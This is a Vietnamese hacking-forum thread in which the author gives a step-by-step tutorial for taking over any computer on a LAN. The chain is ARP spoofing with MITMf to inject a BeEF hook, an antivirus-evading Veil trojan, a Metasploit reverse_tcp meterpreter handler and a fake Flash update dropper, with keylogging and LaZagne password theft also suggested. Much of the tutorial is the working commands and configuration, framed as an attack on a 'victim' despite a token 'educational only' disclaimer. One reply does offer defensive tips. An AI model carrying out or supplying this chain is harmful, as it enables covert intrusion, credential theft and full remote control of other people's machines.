Đột nhập vào một máy tính bất kỳ trong mạng LAN (Phần I)

[Hackerstudent93]

Hi all,

Hôm nay mình đã trở lại và trong bài hôm nay mình sẽ hướng dẫn các bạn thực hiện việc đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit.

​

Thực hiện ý tưởng này dựa trên bạn không thể hacking vào một máy tính trong mạng Lan thông qua khai thác lỗ hỏng 0day.

Ý tưởng: Beef + Mitmf + Veil Evasion + Metasploit.

Beef: Sử dụng để upload file chứa trojan mà Veil Evasion tạo ra đến máy tính nạn nhân qua trình duyệt web

Mitmf có nhiệm vụ tiêm hook.js đến một website bất kỳ khi nạn nhân mở bất kỳ một website nào mới.

Mitmf còn có thể tiêm một file trojan bất kỳ vào máy tính nạn nhân khi nạn nhân download một file .zip về máy mà không hề hay biêt file .zip đấy đã bị nhiễm trojan.

Mitmf còn có thể gi lại thao tác bàn phím trên máy tính nạn nhân khi truy cập trình duyệt web qua jskeylogger

Veil Evasion: tạo một trojan vượt qua tất cả các phần mềm diệt virus mà không bị phát hiện chạy ngầm trong máy tính của nạn nhân. tạo trojan với IP và PORT của máy tính hacker.

Metasploit:Luôn luông lắng nghe ở IP và PORT của hacker khi nạn nhân mở file có chứa trojan thì hacker sẽ đột nhập vào máy tính nạn nhân và toàn quyền kiểm soát. Bằng việc sử dụng các command trong Metasploit. Loạt bài sau tôi sẽ hướng dẫn các bạn sử dụng Metasploit Untimate. Để tăng tinh vui nhộn và đặc sắc thì có thể kết hợp thêm Lazagne để lấy thông tin user and password mà nạn nhân đã lưu trên trình duyệt web. ===> tự tuy duy thêm

Chuần bị:

https://github.com/byt3bl33d3r/MITMf
https://github.com/Veil-Framework/Veil-Evasion

http://beefproject.com/

OS: Kali Linux.

Thực hiện:

Config Beef.

cd /usr/share/beef-xss/extensions/metasploit.

vi config.yaml

host: "192.168.1.12"

callback_host: "192.168.1.12"

{os: 'custom', path: '/usr/share/metasploit-framework/'}

cd /usr/share/beef-xss

vi config.yaml

metasploit:
enable: true

​

Chạy Beef ./beef

Vào trình duyệt gõ địa chỉ sau UI URL: http://192.168.1.12:3000/ui/panel user and pass default: beef and beef

​

Chạy Veil Evasion.

./Veil-Evasion.py

​

Chạy Metasploit.

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*]Started reverse handler on 192.168.1.12:4444
[*]Starting the payload handler...

Chạy Mitmf.

​

mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.18 --inject --js-url http://192.168.1.12:3000/hook.js

Để tăng cuộc chơi thêm vui vẻ và thú vị hơn tôi đã tìm kiến trên internet một bài nhạc mang phong cách đặc trưng của hacker và sẽ phát trên máy tính nạn nhân thông qua Beef. khi tôi thực hiện điều này máy tính của nạn nhất sẽ tự động phát nhạc mà không có bất kì dấu hiệu nào.

copy bài nhạc vào đây.

/usr/share/beef-xss/extensions/demos/html

copy trojan tạo ra vào đây.

/usr/share/beef-xss/extensions/social_engineering/droppers

/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper

​

Ý tương tiếp theo tôi sẽ đầy trojan lên máy tính nạn nhân qua Beef bằng tính năng Fake Flash Updae trong Social Engineering.

Đề làm được việc này bạn cần chạy đoạn mã sau:

curl -H "Content-Type: application/json; charset=UTF-8" -d'{"mount":"/flashplayer.exe", "local_file":"/extensions/social_engineering/droppers/flashplayer.exe"}' -X POST 192.168.1.12.132/api/server/bind?token=4e0f77f2f2ef98f7fd3cd18aebbf96d75ef051cc

==> tôi không giải thích ở đây các bạn phải tự ngiên cứu thêm.

Mở nhạc hacker trên máy tính nạn nhân cho nạn nhân thư giãn tí

​

Kết thúc chúng ta đột nhập thành công vào máy tính nạn nhân và còn mở nhạc cho nạn nhân nghe. còn rất nhiều kỹ thuật nữa trong bài này tôi không public vì tính chất nguy hiểm của nó. mọi người tự nghiên cứu và tư duy thêm

​

 

Re: Đột nhập một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Lưu ý: Bài viết thuộc sở hữu của tác giả nghiên cứu. sao chép đi đâu thì nhớ gi rõ tên tác già : hackersutudent93 và nguồn từ Whitehat.vn. Nghiêm cấm thực hiện việc xấu bài viết chỉ mang tính chất giáo dục . Vui lòng đọc mục pháp luật để hiểu về trách nhiệm của mình khi thực hiện bất cứ một hành vi nào.

Nếu mọi người biết tận dụng tất cả các kỹ năng và tư duy thêm tì lệ thành công là tuyệt đối

Mệt không mở được mắt nữa rồi. Sáng mai sẽ dậy kiểm tra lại xem chưa ổn chỗ nào. Nhớ cám ơn mình để mình tiếp tục có những bài sau hay hơn nữa nhé. Cám ơn tất cả mọi người

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Lưu ý: Bài viết thuộc sở hữu của tác giả nghiên cứu. sao chép đi đâu thì nhớ gi rõ tên tác già : hackersutudent93 và nguồn từ Whitehat.vn. Nghiêm cấm thực hiện việc xấu bài viết chỉ mang tính chất giáo dục . Vui lòng đọc mục pháp luật để hiểu về trách nhiệm của mình khi thực hiện bất cứ một hành vi nào.

​

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

cảm ơn bạn rất nhiều, bài viết thật sự hay và hữu ích. Mình cũng học hỏi rất nhiều từ những bài viết trước đây của bạn. chúc bạn luôn vui khỏe và càng ngày càng có nhiều bài hay nữa

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

(y)

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

bác ơi cho hỏi xíu: lúc e bấm ./beef nó bị lỗi này là sao bác ?

root@kali:/usr/share/beef-xss# ./beef
[11:24:51]
[*]Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[11:24:51]
[*]Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[11:24:51] | Twit: @beefproject
[11:24:51] | Site: http://beefproject.com
[11:24:51] | Blog: http://blog.beefproject.com
[11:24:51] |_ Wiki: https://github.com/beefproject/beef/wiki
[11:24:51]
[*]Project Creator: Wade Alcorn (@WadeAlcorn)
/usr/lib/ruby/1.9.1/psych.rb:203:in `parse': (): found a tab character that violate intendation while scanning a plain scalar at line 9 column 21 (Psych::SyntaxError)
from /usr/lib/ruby/1.9.1/psych.rb:203:in `parse_stream'
from /usr/lib/ruby/1.9.1/psych.rb:151:in `parse'
from /usr/lib/ruby/1.9.1/psych.rb:127:in `load'
from /usr/share/beef-xss/core/main/configuration.rb:46:in `load'
from /usr/share/beef-xss/core/main/configuration.rb:114:in `block in load_modules_config'
from /usr/share/beef-xss/core/main/configuration.rb:113:in `glob'
from /usr/share/beef-xss/core/main/configuration.rb:113:in `load_modules_config'
from /usr/share/beef-xss/core/modules.rb:51:in `load'
from ./beef:65:in `'

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

bác ơi cho hỏi xíu: lúc e bấm ./beef nó bị lỗi này là sao bác ?

root@kali:/usr/share/beef-xss# ./beef
[11:24:51]
[*]Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[11:24:51]
[*]Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[11:24:51] | Twit: @beefproject
[11:24:51] | Site: http://beefproject.com
[11:24:51] | Blog: http://blog.beefproject.com
[11:24:51] |_ Wiki: https://github.com/beefproject/beef/wiki
[11:24:51]
[*]Project Creator: Wade Alcorn (@WadeAlcorn)
/usr/lib/ruby/1.9.1/psych.rb:203:in `parse': (): found a tab character that violate intendation while scanning a plain scalar at line 9 column 21 (Psych::SyntaxError)
from /usr/lib/ruby/1.9.1/psych.rb:203:in `parse_stream'
from /usr/lib/ruby/1.9.1/psych.rb:151:in `parse'
from /usr/lib/ruby/1.9.1/psych.rb:127:in `load'
from /usr/share/beef-xss/core/main/configuration.rb:46:in `load'
from /usr/share/beef-xss/core/main/configuration.rb:114:in `block in load_modules_config'
from /usr/share/beef-xss/core/main/configuration.rb:113:in `glob'
from /usr/share/beef-xss/core/main/configuration.rb:113:in `load_modules_config'
from /usr/share/beef-xss/core/modules.rb:51:in `load'
from ./beef:65:in `'

Bạn chạy lệnh sau: apt-get update để update các gói thư viện và phần mềm trên kai Linux. sau đó thì thử chạy lệnh beef. nếu nó vẫn còn lỗi thì thử upgrade kali Linux lên xem. lỗi này khá khó mình vẫn chưa tìm ra nguyên nhân cụ thể đề fix nó

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Mình đang làm tiếp phần 2 đột nhập vào một máy tính bất kỳ trong mạng Lan với ....... sắp công bố mọi người chú ý theo dõi nhé

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Hôm trước anh @DDOS có cái video dùng ettercap hay zanti gì đó để redirect ALL traffic , anh có thể chỉ rõ hơn về phần đó không ạ (y) , em chưa dùng ettercap lần nào , gg search thì chả thấy đâu

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

(y)

Hôm trước anh @DDOS có cái video dùng ettercap hay zanti gì đó để redirect ALL traffic , anh có thể chỉ rõ hơn về phần đó không ạ (y) , em chưa dùng ettercap lần nào , gg search thì chả thấy đâu

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Hôm trước anh @DDOS có cái video dùng ettercap hay zanti gì đó để redirect ALL traffic , anh có thể chỉ rõ hơn về phần đó không ạ (y) , em chưa dùng ettercap lần nào , gg search thì chả thấy đâu

@zEper Bài của anh @DDos sao lại hỏi anh nhỉ ? nhưng thôi không sao để redirect all traffic với ettercap em phải biết viết một file filters để làm việc này. cụ thể anh sẽ hướng dẫn trong một bài viết sau, cũng như sẽ có phần 2 về Đột Nhập Vào Một Máy Tính Bất Kỳ Trong Mạng Lan với .....

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Hôm trước anh @DDOS có cái video dùng ettercap hay zanti gì đó để redirect ALL traffic , anh có thể chỉ rõ hơn về phần đó không ạ (y) , em chưa dùng ettercap lần nào , gg search thì chả thấy đâu

Xét vể bản chất thì các công cụ mitmf hay ettercap hay zANTI cũng là MITM cả thôi, nên dùng cái nào để MITM cũng không quan trọng.

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Bài rất hay, cho leak lại nhé tác giả.
Góp ý : Để phòng chống tấn công dạng này các bạn có thể sử dụng Comodo Firewall và bật chứng năng Defence+ và Protect Static ARP để chặn chú mitm. Trong bài demo không biết tác giả có cài chương trình Antivirus trên máy nạn nhận hay không, vì nếu có thể khi chạy malware rất có khả năng bị detect và chặn ngay. Do đó , nếu gọi là đột nhập vào máy tính bất kì thì hơi khó mà chỉ là đột nhập vào các máy tính bảo mật yếu thì chuẩn hơn, anh em đỡ lo lắng máy mình có thể bị đột nhập

Nếu có video tut thì hay nhĩ.

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Bài rất hay, cho leak lại nhé tác giả.
Góp ý : Để phòng chống tấn công dạng này các bạn có thể sử dụng Comodo Firewall và bật chứng năng Defence+ và Protect Static ARP để chặn chú mitm. Trong bài demo không biết tác giả có cài chương trình Antivirus trên máy nạn nhận hay không, vì nếu có thể khi chạy malware rất có khả năng bị detect và chặn ngay. Do đó , nếu gọi là đột nhập vào máy tính bất kì thì hơi khó mà chỉ là đột nhập vào các máy tính bảo mật yếu thì chuẩn hơn, anh em đỡ lo lắng máy mình có thể bị đột nhập

Nếu có video tut thì hay nhĩ.

Trong bài Demo victim có sử dụng các phần mềm diệt virus hiệu quả nhất hiện nay như Kaspersky, BKAV, Microsoft Security.... đều bị vô hiệu hóa nhé với Veil Evasion hơn nữa khi Mitm tiêm hook.js vào web browser đều không bị phát hiện nhé, bạn có thể yên tâm về điều này . Về cơ bản bài demo ở trên đã đột nhập vào bất kỳ máy tính nào rồi nhé. chứ không phải máy tính bảo mật yếu. trừ khi bạn sử dụng " Comodo Firewall và bật chứng năng Defence+ và Protect Static ARP để chặn chú mitm " . Cố gắng tư duy thêm và tận dụng mọi kỹ năng, việc hacking vào một máy tính bất kỳ trong mạng Lan kể cả bảo mật mạnh cỡ nào vẫn có thể bị hack nhé. Phần II tôi sẽ giới thiệu như tôi nói và nếu có thời gian tôi sẽ làm tut như bạn yêu cầu

 

Re: Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

Khi mình chạy ./beef và đăng nhập xong phần offline Browsers của mình lại không hiện ra cái gì là sao nhỉ.